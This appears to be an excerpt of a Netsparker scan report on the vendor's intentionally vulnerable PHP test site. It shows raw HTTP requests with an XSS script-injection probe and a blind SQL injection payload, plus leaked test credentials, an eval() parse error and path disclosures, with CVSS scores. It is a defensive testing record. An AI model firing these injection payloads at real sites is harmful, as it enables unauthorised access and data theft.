GET | URI-BASED | /'"--></style></scRipt><scRipt>netsparker(0x000CA2)</scRipt> |
GET /auth/login.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000CA2)%3C/scRipt%3E HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=47
Content-Length: 3161
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="2117">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
autocomplete="off"
to the form tag or to individual "input" fields. However, since early 2014, major browsers don't respect this instruction, due to their integrated password management mechanism, and offer to users to store password internally.WASC | 15 |
CVSS 3.0 SCORE | |
---|---|
Base | 4.6 (Medium) |
Temporal | 4.6 (Medium) |
Environmental | 4.6 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 4.6 (Medium) |
Temporal | 4.6 (Medium) |
Environmental | 4.6 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Netsparker detected the target website is using MySQL as its backend database.
This is generally not a security issue and is reported here for informational purposes only.
Method | Parameter | Value |
---|---|---|
GET | id | -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT 0x4E4554535041524B4552),9,1)),0)=82-- |
GET /artist.php?id=-1%20OR%201%3d1))%20AND%20IFNULL(ASCII(SUBSTRING((SELECT%200x4E4554535041524B4552)%2c9%2c1))%2c0)%3d82--%20 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=67
Content-Length: 3022
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:11:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT 0x4E4554535041524B4552),9,1)),0)=82-- </h3></br>
no rows returned
</p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form method="get" action="artist.php">
<div>
<input type="text" name="id" id="search-text" value=""
…
WASC | 13 |
CVSS 3.0 SCORE | |
---|---|
Base | 4 (Medium) |
Temporal | 4 (Medium) |
Environmental | 4 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 4 (Medium) |
Temporal | 4 (Medium) |
Environmental | 4 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N |
Netsparker identified a possible Internal Path Disclosure (Windows) in the document.
Method | Parameter | Value |
---|---|---|
GET | name | hello.php |
GET /hello.php?name=hello.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2995
Content-Type: text/html
Date: Mon, 13 Jul 20
…>
<div class="post">
<h1 class="title"><a href="#">Hello Service </a></h1>
<p>
Hello Visitor<br />
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b><br />
20$str = 20 hello.php;20 </p>
<div style="clear: both;"> </div>
<div class="entry">
</div>
</div>
<d
…
Method | Parameter | Value |
---|---|---|
GET | name | Visitor |
GET /hello.php?name=Visitor HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2993
Content-Type: text/html
Date: Mon, 13 Jul 20
…>
<div class="post">
<h1 class="title"><a href="#">Hello Service </a></h1>
<p>
Hello Visitor<br />
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b><br />
20$str = 20 Visitor;20 </p>
<div style="clear: both;"> </div>
<div class="entry">
</div>
</div>
<div
…
Method | Parameter | Value |
---|---|---|
GET | file | Generics/about.nsp |
GET /process.php?file=Generics/about.nsp HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3446
Content-Type: text/html
Date: Mon, 13 Jul 20
…iv>
</div>
</div>
<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Access denied for user 'root'@'localhost' (using password: YES) in <b>C:\AppServ\www\Generics\about.nsp</b> on line <b>31</b><br />
asd <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This web
…
WASC | 13 |
Enabled Security Checks | : | Apache Struts S2-045 RCE, Apache Struts S2-046 RCE, BREACH Attack, Code Evaluation, Code Evaluation (Out of Band), Command Injection, Command Injection (Blind), Content Security Policy, Content-Type Sniffing, Cookie, Cross Frame Options Security, Cross-Origin Resource Sharing (CORS), Cross-Site Request Forgery, Cross-site Scripting, Cross-site Scripting (Blind), Custom Script Checks (Active), Custom Script Checks (Passive), Custom Script Checks (Per Directory), Custom Script Checks (Singular), Drupal Remote Code Execution, Expect Certificate Transparency (Expect-CT), Expression Language Injection, File Upload, Header Analyzer, Heartbleed, HSTS, HTML Content, HTTP Header Injection, HTTP Methods, HTTP Status, HTTP.sys (CVE-2015-1635), IFrame Security, Insecure JSONP Endpoint, Insecure Reflected Content, JavaScript Libraries, Local File Inclusion, Login Page Identifier, Mixed Content, Open Redirection, Referrer Policy, Reflected File Download, Remote File Inclusion, Remote File Inclusion (Out of Band), Reverse Proxy Detection, RoR Code Execution, Server-Side Request Forgery (DNS), Server-Side Request Forgery (Pattern Based), Server-Side Template Injection, Signatures, SQL Injection (Blind), SQL Injection (Boolean), SQL Injection (Error Based), SQL Injection (Out of Band), SSL, Static Resources (All Paths), Static Resources (Only Root Path), Unicode Transformation (Best-Fit Mapping), WAF Identifier, Web App Fingerprint, Web Cache Deception, WebDAV, Windows Short Filename, XML External Entity, XML External Entity (Out of Band) |
URL Rewrite Mode | : | Heuristic |
Detected URL Rewrite Rule(s) | : | None |
Excluded URL Patterns | : | (log|sign)\-?(out|off) exit endsession gtm\.js WebResource\.axd ScriptResource\.axd |
Authentication | : | None |
Scheduled | : | No |
Additional Website(s) | : | None |